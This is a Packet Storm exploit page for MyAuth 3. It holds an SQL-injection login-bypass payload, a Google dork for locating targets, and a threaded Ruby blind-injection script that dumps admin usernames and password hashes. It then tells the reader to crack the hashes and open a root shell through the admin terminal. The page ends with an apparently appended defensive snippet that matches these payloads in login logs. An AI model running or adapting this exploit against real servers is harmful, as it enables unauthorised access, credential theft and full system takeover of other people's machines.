
MyAuth 3 Blind SQL Injection
Posted Sep 9, 2011
Authored by Marcio Almeida

MyAuth version 3 remote blind SQL injection exploit that allows for access to a root shell.

tags | exploit, remote, shell, root, sql injection
MD5 | 95079b5dfaf96d2cdb7f4673893fee7f

# Exploit Title: MyAuth3 Blind SQL Injection / Root Shell Access 0day exploit
# Google Dork: allinurl:1881/?console=panel
# Date: 09/06/2011
# Author: Marcio Almeida (marcio[at]alligatorteam[dot]org | @marcioalm)
# Version: 3.0
# Tested on: Linux

#EDB-Note: apparently no true exploit is needed to dump system pwd hashes, because the admin myauth users have the ability to run a terminal session

---------------
PoC (POST data)
---------------
URL:
http://localhost:1881/index.php?console=panel

POST Data (Authentication bypass):
panel_cmd=auth&r=ok&user=alligatorteam&pass=' or 1=1#
---------------

This application has an accessible root shell in the admin interface, located at:

http://localhost:1881/admin/

When you access it, just go to tools / terminal menu and g0t r00t!

The following code will manage all the dirty work for you!

enjoy ;-)

############## EXPLOIT CODE [myauth3_xpl.rb] ##################

require "net/http"
require "net/https"
require "uri"

# Query whose result is recovered one character at a time through the boolean response.
sql = "select concat(user,0x20,pass) from admusers where enable = 1 and accesslevel >= 20"
@target = ARGV[0]
numthreads = ARGV[1]
@verbose = ARGV[2]
@cookie = ""

puts "+=============================================================================+"
puts "| MyAuth 3 - Blind SQL Injection / Root Shell Access 0day exploit |"
puts "| Google Dork: allinurl:1881/?console=panel |"
puts "| author: Marcio Almeida (marcio@alligatorteam.org) |"
puts "| |"
puts "| by Alligator Security Team | irc://irc.freenode.net:8001/#Alligator |"
puts "| twitter: @alligatorteam |"
puts "+=============================================================================+"
puts
if (ARGV[0].nil? || ARGV[1].nil?)
  puts "usage (non verbose): ruby -W0 #{__FILE__} address num_threads"
  puts "usage (verbose): ruby -W0 #{__FILE__} address num_threads -v"
  puts "-----------------------------------------------------------"
  puts "Example 1: ruby -W0 #{__FILE__} 127.0.0.1 5"
  puts "Example 2: ruby -W0 #{__FILE__} www.vulnsite.com.br 5 -v"
  exit(0)
end

# One boolean probe: returns true when the injected condition holds, which the
# application reveals by rendering the authenticated panel (the "Financeiro" menu).
def requisicao(posicao, p_substr, sql)
  useragent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1'
  @http = Net::HTTP.new(@target, 1881)
  # @http.use_ssl = true
  parametro = "panel_cmd=auth&r=ok&user=alligatorteam&pass=' or #{posicao} >= ascii(substr((#{sql}),#{p_substr},1))#"
  resultado = nil
  begin
    # post2 returns only the response object on Ruby 1.9 and later; the original
    # "resp, data = ..." destructuring left data nil there and every probe failed.
    resp = @http.post2("/index.php?console=panel", parametro, {'User-Agent' => useragent, 'Cookie' => @cookie.to_s })
    resultado = resp.body.match(/Financeiro/)
  rescue Exception => e
    puts e
  end
  !resultado.nil?
end

# Binary search over 0..255 for the ASCII value of character p_substr of the result.
def busca_r(menor, maior, p_substr, sql)
  return -1 if menor > maior
  return maior if (maior - menor) == 1
  posicao = (menor + maior) / 2
  if requisicao(posicao, p_substr, sql)
    busca_r(menor, posicao, p_substr, sql)
  else
    busca_r(posicao, maior, p_substr, sql)
  end
end

# Each thread recovers every qtdThreads-th character starting at inicio. A result
# of 1 marks the end of the string: ascii('') is 0, so every probe succeeds and the
# search bottoms out at 1.
def busca_sql(inicio, qtdThreads, sql, str_final)
  resultado = 0
  while resultado != 1
    str_final[inicio] = ""
    resultado = busca_r(0, 255, inicio, sql)
    if resultado != 1
      if @verbose == "-v"
        puts "#{inicio}) Character Found: #{resultado} - #{resultado.chr}"
      end
      str_final[inicio] += resultado.chr
      inicio += qtdThreads.to_i
    end
  end
end

def busca_com_threads(sql, numthreads)
  str_final = []
  threads = []
  # The start index is passed as a thread argument: reading the shared counter
  # inside the block raced with the "count += 1" that followed Thread.new.
  numthreads.to_i.times do |i|
    threads << Thread.new(i + 1) do |inicio|
      busca_sql(inicio, numthreads, sql, str_final)
    end
  end

  threads.each(&:join)

  # Array#to_s inspects the array on Ruby 1.9 and later; join prints the string.
  puts str_final.join
end

puts "When you crack any of the following hashes, go to http://" + @target + ":1881/admin to login into the application."
puts "Then go to tools / terminal menu and get a r00t shell access ;-)"
puts "=========================================================================="
puts "[+] admusers table dumping... (maybe it'll take a little bit of time...)"
puts "=========================================================================="

100.times do |i|
  busca_com_threads(sql + " limit 1 offset " + i.to_s, numthreads)
end
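As an added defensive illustration (not part of the original advisory or exploit), the following Ruby classifies the two payload shapes used above, the tautology bypass and the boolean probe, and counts them per source address. It assumes login POST bodies are available in a log (the "ip<TAB>body" layout and the sample lines are constructed for this example).

```ruby
require "cgi"

# Constructed sample of application-side request logging: one line per login POST,
# "ip<TAB>body". Assumption: the application or a WAF records POST bodies.
SAMPLE_LOG = <<~LOG
  10.0.0.5\tpanel_cmd=auth&r=ok&user=alice&pass=Winter2011
  10.0.0.9\tpanel_cmd=auth&r=ok&user=alligatorteam&pass=%27+or+1%3D1%23
  10.0.0.9\tpanel_cmd=auth&r=ok&user=alligatorteam&pass=%27+or+127+%3E%3D+ascii%28substr%28%28select+concat%28user%2C0x20%2Cpass%29+from+admusers%29%2C1%2C1%29%29%23
  10.0.0.9\tpanel_cmd=auth&r=ok&user=alligatorteam&pass=%27+or+63+%3E%3D+ascii%28substr%28%28select+concat%28user%2C0x20%2Cpass%29+from+admusers%29%2C1%2C1%29%29%23
LOG

# "' or 1=1" style authentication bypass in the pass field.
TAUTOLOGY = /'\s*or\s+\d+\s*=\s*\d+/i
# "' or N >= ascii(substr(" style boolean probe, one bisection step of the extraction.
BLIND_PROBE = /'\s*or\s+\d+\s*>=\s*ascii\(substr\(/i

# Classify one URL-encoded login body. Returns :tautology, :blind_probe or nil.
def classify_login(body)
  params = CGI.parse(body)          # decodes %27 and "+" back to "'" and space
  pass = params.fetch("pass", []).first.to_s
  return :tautology if pass =~ TAUTOLOGY
  return :blind_probe if pass =~ BLIND_PROBE
  nil
end

# Walk the log and return {ip => {kind => count}} for every flagged request.
def scan_log(log)
  hits = Hash.new { |h, k| h[k] = Hash.new(0) }
  log.each_line do |line|
    ip, body = line.chomp.split("\t", 2)
    next if body.nil?
    kind = classify_login(body)
    hits[ip][kind] += 1 if kind
  end
  hits
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |ip, kinds|
    puts "#{ip}: #{kinds.map { |k, n| "#{k}=#{n}" }.join(', ')}"
  end
end
```

Each character the exploit recovers costs about eight probe requests (a bisection of 0..255), so a per-address :blind_probe count in the dozens within a minute is the practical alert threshold, while a single :tautology hit on the login endpoint already warrants a ticket.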

© 2019 Packet Storm. All rights reserved.